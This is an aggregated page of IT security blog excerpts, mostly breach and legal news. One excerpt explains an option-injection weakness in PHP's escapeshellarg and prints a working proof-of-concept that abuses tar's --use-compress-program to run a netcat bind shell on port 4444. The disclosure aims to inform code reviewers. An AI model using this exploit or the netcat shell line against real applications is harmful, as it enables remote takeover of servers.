Top IT Security Bloggers

  • MacRumors hacked – 860,000 email addresses and hashed passwords stolen

    Graham Cluley
    The forums of popular Apple news website MacRumors were hacked, exposing the usernames, email addresses and hashed passwords of over 860,000 members.
  • DOJ: ‘Locking its front gate’ doesn’t let Lavabit off the hook for search warrants

    Sophos - Naked Security
    You can't get out of cooperating with government-ordered electronic surveillance by shutting down, any more than a business can stop police from executing a search warrant by locking its front gate, the US government tutted at former encrypted-email provider Lavabit.
  • Pot-smoking 419ers busted in hotel room crime hub

    Sophos - Naked Security
    Hotel internet connections make it harder to track people down, and after police were called to investigate the smell of marijuana emanating from a South African hotel room, they discovered an advanced Nigerian letter scam crime hub.
  • Feds Charge Calif. Brothers in Cyberheists

    Krebs on Security
    Federal authorities have arrested two young brothers in Fresno, Calif. and charged the pair with masterminding a series of cyberheists that siphoned millions of dollars from personal and commercial bank accounts at U.S. banks and brokerages.
  • Unusual BHEK-Like Spam With Attachment Found

    Trend Micro - Security Intelligence
    Soon after Paunch was arrested, we found that the flow of spam campaigns going to sites with the Blackhole Exploit Kit (BHEK) had slowed down considerably. Instead, we saw an increase in messages with a malicious attachment. Recently, however, we came across rather unusual spam samples that combines characteristics of both attacks. Figure 1. Spammed […]Post from: Trendlabs Security Intelligence Blog - by Trend MicroUnusual BHEK-Like Spam With Attachment Found
  • Unusual BHEK-Like Spam With Attachment Found

    TrendLabs - Malware Blog
    Soon after Paunch was arrested, we found that the flow of spam campaigns going to sites with the Blackhole Exploit Kit (BHEK) had slowed down considerably. Instead, we saw an increase in messages with a malicious attachment. Recently, however, we came across rather unusual spam samples that combines characteristics of both attacks. Figure 1. Spammed […]Post from: Trendlabs Security Intelligence Blog - by Trend MicroUnusual BHEK-Like Spam With Attachment Found
  • Microsoft leads the way, setting new cryptographic defaults

    Sophos - Naked Security
    Microsoft is upping its game with regards to cryptographic standards. By discontinuing support for the older, weak RC4 cipher and putting Certificate Authorities on note to migrate to SHA-2, it seems to be leading the way to be ready for the future, rather than reacting.
  • Security issues with using PHP's escapeshellarg

    Bae Systems Detica
    Using user supplied data on the command line is traditionally a security disaster waiting to happen. In an infinite universe there are however times when you might need to do just that. You will be glad to know that PHP provides two functions to aid you with security in those situations: escapeshellcmd and escapeshellarg.The PHP documentation defines these functions as: escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before this data is passed to the exec() or system() functions, or to the backtick operator.Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes allowing you to pass a string directly to a shell function and having it be treated as a single safe argument. This function should be used to escape individual arguments to shell functions coming from user input. The shell functions include exec(), system() and the backtick operator.There are some caveats around the use of these functions which the documentation doesn't cover, command line switches inside single quotes are still treated as command line switches. For example: ls '--help' will print the help text for the ls command. Thus it may be possible to inject data to alter the intended execution, typically referred to as command injection. In order to illustrate this bug I have created a simple proof of concept script which will spawn a bind shell on port 4444 by diverting the execution of tar with command line switches:<?php# PoC exploit of php not escaping dash characters in escapeshellarg/cmd# Reference: http://php.net/manual/en/function.escapeshellarg.php# Written by Eldar "Wireghoul" Marcussen# Create a malicious file:$fh = fopen('myfile.png', 'w');fwrite($fh, "<?php system('nc -lvp 4444 -e /bin/bash'); echo 'WINRAR!'; ?>");fclose($fh);# I choose to use php here, you could use whatever binary you like$safe_opts = escapeshellarg('--use-compress-program=php');$safe_file = escapeshellarg('myfile.png'); # Really a php script with a .png extensionsystem("tar $safe_opts -cf export.tar $safe_file");?> The response from the PHP security team is that this is expected behavior, and that it is not possible to protect programs that use parameters in unsafe ways. While I understand their point of view, I still feel that the documentation does not clearly highlight the potential risk around using escapeshellarg. And if you are doing source code reviews I would take a closer look at any operation which relies on escapeshellarg to sanitise user supplied input.
  • Loyaltybuild attack: 500,000 people may have had credit card details stolen

    Sophos - Naked Security
    Thousands of people across Europe and, more specifically, in Northern Ireland have had their credit card and personal details stolen after a company which runs reward schemes was hacked.
CSO Corporate Partners
  • Webroot
  • Trend Micro
  • NetIQ
rhs_login_lockGet exclusive access to CSO, invitation only events, reports & analysis.
CSO Directory

Webroot Web Security

Proactive web security that blocks threats in the cloud before they reach users’ machines, or enter customers’ networks.

Latest Jobs
Security Awareness Tip

Incident handling is a vast topic, but here are a few tips for you to consider in your incident response. I hope you never have to use them, but the odds are at some point you will and I hope being ready saves you pain (or your job!).


  1. Have an incident response plan.

  2. Pre-define your incident response team 

  3. Define your approach: watch and learn or contain and recover.

  4. Pre-distribute call cards.

  5. Forensic and incident response data capture.

  6. Get your users on-side.

  7. Know how to report crimes and engage law enforcement. 

  8. Practice makes perfect.

For the full breakdown on this article

Security ABC Guides

Warning: Tips for secure mobile holiday shopping

I’m dating myself, but I remember when holiday shopping involved pouring through ads in the Sunday paper, placing actual phone calls from tethered land lines to research product stock and availability, and actually driving places to pick things up. Now, holiday shoppers can do all of that from a smartphone or tablet in a few seconds, but there are some security pitfalls to be aware of.